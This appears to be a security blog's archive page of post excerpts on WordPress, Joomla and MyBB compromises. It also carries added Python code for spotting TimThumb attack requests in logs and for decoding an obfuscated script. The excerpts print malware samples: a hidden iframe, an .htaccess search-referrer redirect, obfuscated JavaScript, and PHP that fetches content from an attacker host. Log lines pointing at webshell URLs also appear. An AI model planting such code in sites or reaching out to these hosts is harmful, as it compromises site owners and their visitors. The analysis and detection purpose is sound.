List of Domains Hosting Webshells for Timthumb Attacks

We have been tracking TimThumb-related attacks for a while, and they are still going at full force (yes, some people are still using the outdated versions and getting compromised).

Just for the month of May, we identified more than 400 domains hosting backdoors for this type of attack, and a botnet with more than 1,000 IP addresses scanning for sites that might be vulnerable to it.

If you like to look at your logs, this is what it looks like:

216.227.214.242 - - [31/May/2012:03:55:35 +0000] "GET /wp-content/themes/vibrantcms/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 404 9347 "-" ""

or

112.78.3.167 - - [31/May/2012:03:45:50 +0000] "GET //wp-content/themes/Quadro/timthumb.php?src=http://img.youtube.com.spectra-entertainment.com/upload.php HTTP/1.1" 404 305 "-" ""

The scanners are basically probing hundreds of theme paths per site that could still have the old timthumb.php enabled, and attempting to make it fetch the backdoors from http://img.youtube.com.spectra-entertainment.com/upload.php and http://blogger.com.nilgirisrealty.com/cok.php onto the site.
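To pick these requests out of your own access logs, here is an added example (not code from the post or from Sucuri) that parses Apache combined-format lines, keeps only requests to timthumb.php/thumb.php, and classifies the src host. The TRUSTED tuple is an assumption standing in for the allow-list old TimThumb releases shipped, and the third log line is a constructed benign request added for contrast.

```python
import re
from urllib.parse import parse_qs, urlparse

# Two requests transcribed from the post, plus one constructed benign thumbnail request (10.0.0.5).
LOG_LINES = [
    '216.227.214.242 - - [31/May/2012:03:55:35 +0000] "GET /wp-content/themes/vibrantcms/'
    'thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 404 9347 "-" ""',
    '112.78.3.167 - - [31/May/2012:03:45:50 +0000] "GET //wp-content/themes/Quadro/'
    'timthumb.php?src=http://img.youtube.com.spectra-entertainment.com/upload.php HTTP/1.1" 404 305 "-" ""',
    '10.0.0.5 - - [31/May/2012:04:00:00 +0000] "GET /wp-content/themes/demo/'
    'timthumb.php?src=http://img.youtube.com/vi/abc123/0.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

# Assumed allow-list standing in for the one old TimThumb releases shipped. Those versions accepted
# any src whose host merely *contained* one of these names, which the lookalike hosts above satisfy.
TRUSTED = ("blogger.com", "youtube.com", "flickr.com", "picasa.com")

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<req>\S+)[^"]*" (?P<status>\d{3})')


def classify(line):
    """None for lines that are not TimThumb requests; otherwise a dict with a verdict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("req").partition("?")
    if not path.endswith(("/timthumb.php", "/thumb.php")):
        return None
    src = parse_qs(query).get("src", [""])[0]
    host = (urlparse(src).hostname or "").lower()
    if not host:
        verdict = "local"                      # relative src, no remote fetch involved
    elif any(host == t or host.endswith("." + t) for t in TRUSTED):
        verdict = "trusted"                    # the real domain or a genuine subdomain of it
    elif any(t in host for t in TRUSTED):
        verdict = "lookalike"                  # trusted name buried inside an unrelated domain
    else:
        verdict = "external"
    return {"ip": m.group("ip"), "host": host, "src": src, "verdict": verdict}


def suspicious_sources(lines):
    """(client IP, src host) pairs worth blocking: a non-trusted src that points at a .php file."""
    hits = []
    for line in lines:
        r = classify(line)
        if r and r["verdict"] != "trusted" and r["src"].lower().endswith(".php"):
            hits.append((r["ip"], r["host"]))
    return hits
```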

The full list of domains hosting the backdoor is on our labs post:

List of domains hosting webshells for Timthumb attacks

and the list of IP addresses there too:

List of IP addresses scanning for vulnerable timthumb.

PHP-CGI Vulnerability Exploited in the Wild

When the PHP-CGI vulnerability was disclosed, we knew it would be just a matter of days before it started to be exploited in the wild.

Well, it didn't take long. Since the weekend we have been seeing scanners looking for that vulnerability on our servers and honeypots, and now we are seeing sites getting compromised through it as well.

Understanding the Attack

So far we have noticed that the attack starts in one of two ways. The first is checking whether the server is vulnerable using the ?-s option (which shows the source of the page):


WordPress Third Party Vulnerability – Deans FCKEditor with PWWANGS Code for WordPress (version 1.0.0)

You have heard me write in the past about understanding the true vulnerability within WordPress. In that post I talk about the benefits of the platform and how those same benefits are also its weakness. This post is an example that brings that point home, specifically about staying diligent with your plugins.

It was recently reported that a plugin for WordPress, Deans FCKEditor with PWWANGS Code Plugin for WordPress, contains a very serious vulnerability that gives hackers full control to modify, upload and execute files within your WordPress install (source: PacketStorm). The vulnerability is actually not new; it was found in version 1.0.0. That is not the point, though. The point is that this version is in fact vulnerable.

Malware Being Called From Your php.ini File

Is your site infected with malware, and you can't find it anywhere? It might be a good idea to search outside of your web directory and look in your main configuration files (especially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>

These specific strings are not found anywhere in the website files, which is very concerning. We are finding that entire servers are being compromised, and that the main server php.ini file (/etc/php/php.ini) has the following setting added:


Joomla 1.5.25/1.7.3 Released (Security Update)

If you are using Joomla, now is the time to update it. A new version was just released for the 1.5.x and 1.7.x branches, fixing a high-priority security issue that allows remote users to change other users' passwords (even the admin account).

More details on the Joomla website and here.

Description:
Weak random number generation during password reset leads to possibility of changing a user’s password.


Htaccess Redirection to Sweepstakesandcontestsinfo dot com

Last week we started to see a large increase in the number of sites compromised with a .htaccess redirection to http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555.

This domain has been used to distribute malware for a while (generally through JavaScript injections), but only in the last few days did we start seeing it done via .htaccess.

* The malicious site(s) are not blacklisted by Google (or any major blacklist) at this time, which makes spreading the malware pretty simple for the attackers.

This is what gets added to the .htaccess of the compromised sites:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>


Timthumb.php Mass Infection – Aftermath – Part I

If you use WordPress you’re probably aware of the mass infection caused by a vulnerability in the timthumb.php script, a photo manipulation script included in many themes and plugins.

Sites were compromised with anything from malware to Blackhat SEO spam, to .htaccess redirections.

It would be useful to gain metrics based on the number of sites that were truly affected, but the problem is that it is very hard to estimate how many sites were in fact compromised. 1 thousand, 100 thousand, 1 million? Who knows for sure.

We found a way to get close to the actual numbers. For the last couple of months, most of the compromised sites had their wp-settings.php modified with a function that contacts the URL http://91.196.216.30/bt.php for instructions on what to do with the site (display malware, spam, etc.). Yes, kinda like a command and control site.


MyBB web site and downloads compromised

It's not good when your site gets infected with malware, especially if you're a provider of software to many. If you are using MyBB (forum software), please be aware that their web site was hacked and the software download packages compromised:

There was unfortunately a vulnerability in the CMS which powers the MyBB home page and downloads system. Using this vulnerability a hacker was able to add a backdoor to one of the files, allowing them to execute arbitrary PHP and manipulate the release packages. The CMS was custom written a number of years ago, however we believe a 3rd party framework used by the CMS contributed to the vulnerability. The CMS shares no code with MyBB so there should be no concern that these events indicate a vulnerability in MyBB. The server is also configured to isolate the subdomains belonging to the MyBB website, so it is unlikely that any data from the community forums or other sections of the site was compromised.

The MyBB team recommend these actions:

  1. Download the latest release of MyBB.
  2. Replace ./index.php (in the root folder of your forum) with the one in the download (./Upload/index.php).
  3. Remove the ./install/ folder.

*We are trying to find more information about the backdoor that was added, but no luck yet. If you find a link with the affected version, let us know.

Malware Infections from rebotstat dot com

We are starting to share some of our research and our view of web-based malware online: http://sucuri.net/global. The #1 infection we have seen in the last few days is caused by a heavily obfuscated piece of JavaScript malware:

<!-- o --><script>b=new function()
{return 2;};if(!+b)String.prototype.vqwfbeweb='h'+'arC';for(i
in $='b4h3tbn')
if(i=='vqwfbeweb')m=$[i];try{new Object().wehweh();}catch(q)
{ss="";}try{window['e'+'v'+'al']('asdas')}catch(q)
{s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd='e';if({}.asd==='e')a=document["c"+"r"+"e"+"a"+"t"+"e"+"T"+"e"+"x"+"t"+"N"+"o"+"d"+"e"]('321');if(a.data==321)x=-1*(d-d2);
n=[-x+7,-x+7,-x+103,-x+100,-x+30,-x+38,-x+98,-x+109,-x+97,-x+115,
-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,
-x+107,-x+99,..
for(i=0;i<n.length;i++)ss +=s(e val("n"+"[i"+"]"));
if(!+b) e val(ss);</script><!-- c -->
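The numbers in that n=[...] array are the payload characters shifted by a key the loader derives from the two-millisecond Date difference (x = -2), and s() is String.fromCharCode. The decoder below is an added example, not part of the post, that recovers the key and the plaintext from the literal without executing any of the script; the input is transcribed from the fragment above and stops where the post truncates the array.

```python
import re

# Transcribed from the obfuscated sample in the post. The post truncates the n=[...] array
# with "..", so only the visible terms are included and the bracket is closed here.
SAMPLE = (
    "d=new Date();d2=new Date(d.valueOf()-2);"
    "x=-1*(d-d2);n=[-x+7,-x+7,-x+103,-x+100,-x+30,-x+38,-x+98,-x+109,-x+97,-x+115,"
    "-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,"
    "-x+107,-x+99];"
    'for(i=0;i<n.length;i++)ss +=s(e val("n"+"[i"+"]"));'
)


def recover_x(script):
    """The loader sets d2 = d - DELTA ms and x = -1*(d-d2), so x is simply -DELTA regardless
    of the clock; read DELTA out of the literal instead of running the script."""
    m = re.search(r"d2=new Date\(d\.valueOf\(\)-(\d+)\)", script)
    if not m:
        raise ValueError("date-difference key not found")
    return -int(m.group(1))


def decode_payload(script):
    """Rebuild the string the loader would hand to eval: each n[i] is -x+k and s() is
    String.fromCharCode, so every term is one character with code k - x."""
    x = recover_x(script)
    _, found, array_body = script.partition("n=[")
    if not found:
        raise ValueError("character array not found")
    terms = re.findall(r"-x\+(\d+)", array_body)
    return "".join(chr(-x + int(k)) for k in terms)


if __name__ == "__main__":
    print(repr(decode_payload(SAMPLE)))
```

The visible terms decode to the start of a `document.getElement...` call, which is as far as the post's fragment goes.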


Website Getting Redirected? It Might Have Something To Do With Moneygram-tracking Dot Com

Have you ever tried to visit your site and been redirected to a different site? Maybe to some external news page that had nothing to do with your site? And then, when you tried to visit it again to test, it worked properly?

Over the last few days we have been getting this question often, and it means that your site has been hacked and compromised. Basically, the attackers added code similar to this to your site:

$url = "http://moneygram-tracking.com/cabl/ws/12/request.php?ip=".$_SERVER['REMOTE_ADDR']."&useragent=".urlencode($_SERVER['HTTP_USER_AGENT'])."&referer=".urlencode($_SERVER["HTTP_REFERER"]);
$answer = file_get_contents($url);
if (strpos($answer,"noredirect") === false) {
    echo $answer;
}
